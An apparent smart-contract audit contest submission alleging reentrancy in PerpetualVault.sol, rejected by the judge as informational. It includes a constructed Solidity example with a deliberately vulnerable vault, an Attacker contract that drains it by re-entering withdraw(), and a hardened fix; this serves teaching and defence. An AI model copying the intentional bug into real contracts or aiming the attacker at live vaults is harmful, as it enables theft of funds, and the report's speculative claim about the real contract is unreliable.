DeFiFoundry
50,000 USDC
Submission Details
Severity: low
Invalid

Reentrancy Vulnerability in PerpetualVault.sol

Summary

This report claims that PerpetualVault.sol is exposed to reentrancy during deposit and withdrawal. Although the contract uses ReentrancyGuard, the report argues that the guard may not cover every path on which the vault calls out to external protocols such as GMX or Paraswap.

Vulnerability Details

The deposit and withdraw functions in PerpetualVault.sol call into external contracts (e.g., GMX, Paraswap) and into the token contract. The report argues that if a token with transfer hooks were used in place of a plain ERC-20, or if an external call handed control to an attacker-controlled contract, the vault could be re-entered before its accounting is updated. The deposit function is cited as the example:

    // As submitted: the token transfer (an external call) runs before the
    // vault's own accounting in _updateDeposit. The function already carries
    // nonReentrant.
    function deposit(uint256 amount) external nonReentrant {
        require(amount >= minDepositAmount, "Deposit too small");
        IERC20(usdc).transferFrom(msg.sender, address(this), amount); // external call
        _updateDeposit(msg.sender, amount);                            // state change
        emit Deposit(msg.sender, amount);
    }

Impact

If such a re-entry point existed, an attacker could call withdraw (or deposit) again from inside the external call, before the vault's balance accounting is updated, and repeat this until the vault is drained.

Tools Used

  • Slither (static analysis tool)

  • Manual code review

Recommendations

Apply the nonReentrant modifier to every function that interacts with an external contract, and follow the checks-effects-interactions pattern so that all state changes are written before any external call. Note that the deposit function shown above already carries nonReentrant; the change below only moves the state update ahead of the transfer. Because the deposit is then credited before the tokens arrive, the transfer must revert on failure rather than return false; SafeERC20's safeTransferFrom guarantees this for any ERC-20, not only USDC.

    // Proposed ordering: checks, then effects, then interactions.
    function deposit(uint256 amount) external nonReentrant {
        require(amount >= minDepositAmount, "Deposit too small");   // checks
        _updateDeposit(msg.sender, amount);                          // effects (state change before external call)
        IERC20(usdc).transferFrom(msg.sender, address(this), amount); // interactions (must revert on failure)
        emit Deposit(msg.sender, amount);
    }

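The following is an added, self-contained illustration of the pattern this report describes, not code from PerpetualVault.sol or the DeFiFoundry codebase. It pairs a vault whose withdraw() calls out before updating its accounting with an attacker that re-enters during that call, and then the same vault rewritten with checks-effects-interactions plus a reentrancy guard. It uses a native ETH transfer as the external call because that is the simplest path that hands execution to the recipient; a plain ERC-20 such as USDC gives the receiver no execution during transferFrom, which is why the deposit snippet above has no callback on its own. The contract names, the local ReentrancyGuard and the attack flow are all assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Constructed example (not project code): vulnerable vault, attacker, hardened vault.

contract VulnerableVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // BUG (intentional): the external call runs before the balance is zeroed,
    // so the recipient's receive() can call withdraw() again with a stale balance.
    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        balances[msg.sender] = 0;
    }
}

contract Attacker {
    VulnerableVault public immutable vault;

    constructor(VulnerableVault _vault) {
        vault = _vault;
    }

    // Deposit once, then withdraw; each payout re-enters withdraw() from receive().
    function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.withdraw();
    }

    // Re-enter while the vault still believes we hold a balance. Stop once the
    // vault cannot cover another payout so the final call does not revert the chain.
    receive() external payable {
        if (address(vault).balance >= msg.value) {
            vault.withdraw();
        }
    }
}

// Minimal guard with the same semantics as a standard nonReentrant modifier
// (assumed locally to keep the example in one file).
abstract contract ReentrancyGuard {
    uint256 private _locked = 1;

    modifier nonReentrant() {
        require(_locked == 1, "reentrant call");
        _locked = 2;
        _;
        _locked = 1;
    }
}

contract HardenedVault is ReentrancyGuard {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // Checks, then effects, then interactions: the balance is zeroed before the
    // external call, so a re-entrant withdraw() fails the require; the guard
    // rejects the nested call before that point anyway.
    function withdraw() external nonReentrant {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}
```

Deployed against a funded VulnerableVault, Attacker.attack() drains it down to the attacker's own deposit size; pointed at HardenedVault, the nested withdraw() reverts with "reentrant call" and the attacker receives only its own deposit. Either ordering fix or the guard alone is enough to stop this particular attacker; using both is the defence in depth the recommendation above asks for.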
Updates

Lead Judging Commences

n0kto Lead Judge 3 months ago
Submission Judgement Published
Invalidated
Reason: Non-acceptable severity
Assigned finding tags:

Informational or Gas

Please read the CodeHawks documentation to know which submissions are valid. If you disagree, provide a coded PoC and explain the real likelihood and the detailed impact on the mainnet without any supposition (if, it could, etc) to prove your point.
